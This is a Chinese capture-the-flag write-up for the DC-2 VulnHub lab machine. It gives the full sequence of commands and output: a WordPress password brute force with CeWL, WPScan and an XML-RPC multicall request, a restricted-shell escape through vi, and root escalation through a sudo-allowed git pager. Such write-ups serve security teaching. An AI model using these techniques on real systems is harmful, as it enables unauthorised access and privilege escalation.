DC-2

靶机获取:http://www.five86.com/

靶机IP:192.168.43.197(arp-scan l) 攻击机器IP:192.168.43.199

在hosts文件里添加:192.168.43.197 dc-2 #把ip换成自己的

0X1:信息收集

nmap:
⚡ root@roots  /work/DC/DC-2  nmap -A 192.168.43.197
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-13 14:08 CST
Nmap scan report for DC-2 (192.168.43.197)
Host is up (0.00032s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
| http-title: DC-2 – Just another WordPress site
|_Requested resource was http://dc-2/
MAC Address: 08:00:27:36:54:53 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms DC-2 (192.168.43.197) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds

访问一下,发现页面是Wordpress,并且发现有一个flag的提示

flag1
#http://dc-2/index.php/flag/
Flag 1: Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. More passwords is always better, but sometimes you just can’t win them all. Log in as one to see the next flag. If you can’t find it, log in as another.

提示我们使用 cewl 收集页面信息,生成密码,用于登录(爆破)

cewl:
 cewl dc-2 -w dict.txt
⚡ root@roots  /work/DC/DC-2  cewl dc-2 -w dict.txt
CeWL 5.4.4.1 (Arkanoid) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
⚡ root@roots  /work/DC/DC-2  cat dict.txt
sit
amet
nec
quis
vel
...............
wpscan:
##wpscan --url dc-2 默认扫描
##wpscan --url dc-2 -eu 扫描用户名 (手工探测 http://dc-2/?author=1 2 3 4 5 6 ....)
⚡ root@roots  /work/DC/DC-2  wpscan --url dc-2
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team
Version 3.4.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________ [+] URL: http://dc-2/
[+] Started: Tue Aug 13 14:19:38 2019 Interesting Finding(s): [+] http://dc-2/
| Interesting Entry: Server: Apache/2.4.10 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100% [+] http://dc-2/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://dc-2/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100% [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
| Detected By: Rss Generator (Passive Detection)
| - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
| - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
|
| [!] 10 vulnerabilities identified:
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.7.11
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.7.12
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
|
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
| Fixed in: 5.0.1
| References:
| - https://wpvulndb.com/vulnerabilities/9222
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
| - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
| - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
|
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
| Fixed in: 4.7.13
| References:
| - https://wpvulndb.com/vulnerabilities/9230
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
| - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
| - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
| - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/ [+] WordPress theme in use: twentyseventeen
| Location: http://dc-2/wp-content/themes/twentyseventeen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.2
| Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Detected By: Css Style (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Detected By: Style (Passive Detection)
| - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==========================================> (21 / 21) 100.00% Time: 00:00:00 [+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection) [+] tom
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection) [+] jerry
| Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection) [+] Finished: Tue Aug 13 14:42:00 2019
[+] Requests Done: 21
[+] Cached Requests: 35
[+] Data Sent: 4.394 KB
[+] Data Received: 520.309 KB
[+] Memory used: 2.758 MB
[+] Elapsed time: 00:00:05

我们可以得到wordpress的版本信息,以及CVE,不过打靶机通过CVE没啥意思,按照作者的思路爆破

发现三个用户名 admin tom jerry
wpscan_爆破:
1. wpscan --url dc-2 -P dict.txt
#得到结果
[i] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient 2.使用hydra爆破
3.使用XMLRPC:
用户名密码:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient

11

3.使用XMLRPC:
burp包:
POST /xmlrpc.php HTTP/1.1
Host: dc-2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 910 <?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>system.multicall</methodName>
<params><param>
<value><array><data>
<value><struct>
<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data>
<value><string>jerry</string></value>
<value><string>adipiscing</string></value>
</data></array></value></member>
</struct></value> <value><struct>
<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data>
<value><string>guest</string></value>
<value><string>test</string></value>
</data></array></value></member>
</struct></value>
</data></array></value>
</param></params>
</methodCall>

Get_shell:

登录jerry之后,发现flag2

flag2
Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

说利用wordpress走捷径,我想到了CVE,先不用CVE自己再想想毕竟拿过来一个脚本跑跑没啥意思

再次nmap:

自己习惯第一次nmap -A 简单探测一下,现在我们全面测试一下

⚡ root@roots  /work/DC/DC-2  nmap -sT  -p-  -A dc-2
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-13 16:04 CST
Nmap scan report for dc-2 (192.168.43.197)
Host is up (0.00043s latency).
rDNS record for 192.168.43.197: DC-2
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:36:54:53 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE
HOP RTT ADDRESS
1 0.43 ms DC-2 (192.168.43.197) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds

有新的收获,发现ssh端口7744,尝试登录下,测试出来用tom

登录:
 ✘ ⚡ root@roots  ~  ssh tom@192.168.43.197 -p7744
The authenticity of host '[192.168.43.197]:7744 ([192.168.43.197]:7744)' can't be established.
ECDSA key fingerprint is SHA256:ZbyT03GNDQgEmA5AMiTX2N685NTzZuOoyMDIA+DW1qU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.43.197]:7744' (ECDSA) to the list of known hosts.
tom@192.168.43.197's password: The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt usr

​ 发现flag3.txt 很无语 cat id 等很多命令都不能用 是一个什么rbash,但是比较心急的我,用vim试试了得到flag3.txt

flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

#大概就是让我们切换到jerry
rabsh:

执行一下一些命令得到报错,根据报错搜索了解 rbash 吧 没办法

tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ id
-rbash: id: command not found
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found #新建一个vi shell.txt 在里边输入
: set shell =/bin/sh
:shell #就可以了

11

得到sh权限

/bin/sh: 2: cat: not found
$ whoami
/bin/sh: 3: whoami: not found
$ export
export HOME='/home/tom'
export LANG='en_US.UTF-8'
export LC_CTYPE='zh_CN.UTF-8'
export LOGNAME='tom'
export MAIL='/var/mail/tom'
export PATH='/home/tom/usr/bin'
export PWD='/home/tom'
export SHELL='/bin/rbash'
export SHLVL='1'
export SSH_CLIENT='192.168.43.199 37218 7744'
export SSH_CONNECTION='192.168.43.199 37218 192.168.43.197 7744'
export SSH_TTY='/dev/pts/0'
export TERM='xterm'
export USER='tom'
export VIM='/usr/share/vim'
export VIMRUNTIME='/usr/share/vim/vim74'
export _='whoami'

改变一下环境变量

$ export PATH=/usr/sbin:/usr/bin:/sbin:/bin
$ id
uid=1001(tom) gid=1001(tom) groups=1001(tom)
#所有命令均可以正常使用切换到jerry
Password:
jerry@DC-2:/etc$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry)
jerry@DC-2:/etc$ cd ~
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. You still need to get the final flag (the only flag that really counts!!!). No hints here - you're on your own now. :-) Go on - git outta here!!!!
flag4:
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

提权:

​ 大概的思路都尝试一下,这次没想到竟然在history中得到收获

jerry@DC-2:/var/www/html$ history
1 cd
2 rm .bash_history
3 exit
4 cd
5 pwd
6 ls
7 id
8 pwd
9 vi flag4.txt
10 ls
11 sudo git
12 sudo git help
13 sudo git help status jerry@DC-2:/var/www/html$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

通过学习大佬的wp可以这样

sudo git -p help config
!/bin/sh
sudo git -p help config
jerry@DC-2:/var/www/html$ sudo git -h
Unknown option: -h
usage: git [--version] [--help] [-C <path>] [-c name=value]
[--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]
[-p|--paginate|--no-pager] [--no-replace-objects] [--bare]
[--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]
<command> [<args>]
jerry@DC-2:/var/www/html$ sudo git -p help config
man: can't set the locale; make sure $LC_* and $LANG are correct
GIT-CONFIG(1) Git Manual GIT-CONFIG(1) NAME
git-config - Get and set repository or global options SYNOPSIS
git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
git config [<file-option>] [type] --add name value
git config [<file-option>] [type] --replace-all name value [value_regex]
git config [<file-option>] [type] [-z|--null] --get name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
git config [<file-option>] --unset name [value_regex]
git config [<file-option>] --unset-all name [value_regex]
git config [<file-option>] --rename-section old_name new_name
git config [<file-option>] --remove-section name
git config [<file-option>] [-z|--null] -l | --list
!/bin/sh # id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
final-flag.txt
# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/ Congratulatons!!! A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated. If you enjoyed this CTF, send me a tweet via @DCAU7.

总结:

这个靶机rbash 和git提权比较有趣,其他中规中矩。
通过这个靶机学习到了wordpress的爆破 还可以使用 XMLPRC在被限制的情况下或者不想留下太多痕迹
git的好像是个缓冲区漏洞,还没来得及了解

学习:

cewl : https://www.4hou.com/tools/14693.html
XMLRPC:
1.https://blog.knownsec.com/2015/10/wordpress-xmlrpc-brute-force-amplification-attack-analysis/
2.http://mtfly.net/179
nmap: https://www.cnblogs.com/Vinson404/p/7784829.html
rbash:
1.https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
2.https://www.anquanke.com/post/id/173159
git提权:https://gtfobins.github.io/gtfobins/git/

DC-2靶机的更多相关文章

  1. DC 1-3 靶机渗透

    DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...

  2. Vulnhub DC-9靶机渗透

    信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.147 #扫描端口等信息 22端口过滤,80端口开放,同样的从80端口入手. 不是现成 ...

  3. vulnhub-DC:2靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  4. vulnhub-DC:1靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...

  5. vulnhub-DC:3靶机渗透记录

    准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...

  6. vulnhub-DC:4靶机渗透记录

    准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...

  7. vulnhub-DC:5靶机渗透记录

    准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  8. vulnhub-DC:6靶机渗透记录

    准备工作 在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...

  9. vulnhub-DC:7靶机渗透记录

    准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...

  10. DC-1 靶机渗透测试

    DC-1靶机渗透测试 对着镜子大喊三声"太菜了""太菜了""太菜了" DC系列靶机的第一篇.边学习边日靶机边进步,摸爬滚打着前行. 内容不只 ...

随机推荐

  1. Spring MVC源码(二) ----- DispatcherServlet 请求处理流程 面试必问

    前端控制器 前端控制器,即所谓的Front Controller,体现的是设计模式中的前端控制器模式.前端控制器处理所有从用户过来的请求.所有用户的请求都要通过前端控制器.SpringMVC框架和其他 ...

  2. [NOIP2003] 传染病控制题解

    问题 F: [NOIP2003] 传染病控制 时间限制: 1 Sec  内存限制: 128 MB 题目描述 [问题背景] 近来,一种新的传染病肆虐全球.蓬莱国也发现了零星感染者,为防止该病在蓬莱国大范 ...

  3. [WPF自定义控件库]了解WPF的布局过程,并利用Measure为Expander添加动画

    1. 前言 这篇文章介绍WPF UI元素的两步布局过程,并且通过Resizer控件介绍只使用Measure可以实现些什么内容. 我不建议初学者做太多动画的工作,但合适的动画可以引导用户视线,提升用户体 ...

  4. ES6 let const 关键字

    ECMAScript 和 JavaScript的关系? 前者是后者的规格,后者是前者的实现. 符合ECMAScript 规格的还有 Flash 中的AcionScript 和 TypeScript. ...

  5. Docker笔记(五):整一个自己的镜像

    原文地址:http://blog.jboost.cn/2019/07/17/docerk-5.html 获取镜像的途径有两个,一是从镜像仓库获取,如官方的Docker Hub,二是自定义.上文已经介绍 ...

  6. 字符串翻转demo

    1.利用char数组 public class stringfanzhaun { public static void main(String[] args) { String str="1 ...

  7. ASP.NET Core MVC 之布局(Layout)

    1.什么是布局 布局通常包含常见的用户界面元素,例如应用头,导航或菜单元素和页脚,如图: 常见的HTML结构(例如脚本和样式表)也经常被应用程序中许多页面使用.所有这些共享元素都可以在布局中定义,然后 ...

  8. Java类方法重载与重写

    目录 - 方法重载 - 方法重写 @(Java类方法重载与重写) - 方法重载 1.方法名相同 2.参数列表不同 public void person(double height,double wei ...

  9. Mysql Atm取款机系统模拟案例

    #创建ATM数据库 CREATE DATABASE ATM; #创建用户CREATE USER `ATMMaster` IDENTIFIED BY '1234';GRANT ALL ON ATM.* ...

  10. 2019杭电多校第二场hdu6602 Longest Subarray(线段树)

    Longest Subarray 题目传送门 解题思路 本题求一个最大的子区间,满足区间内的数字要么出现次数大于等于k次,要么没出现过.给定区间内的数字范围是1~c. 如果r为右边界,对于一种数字x, ...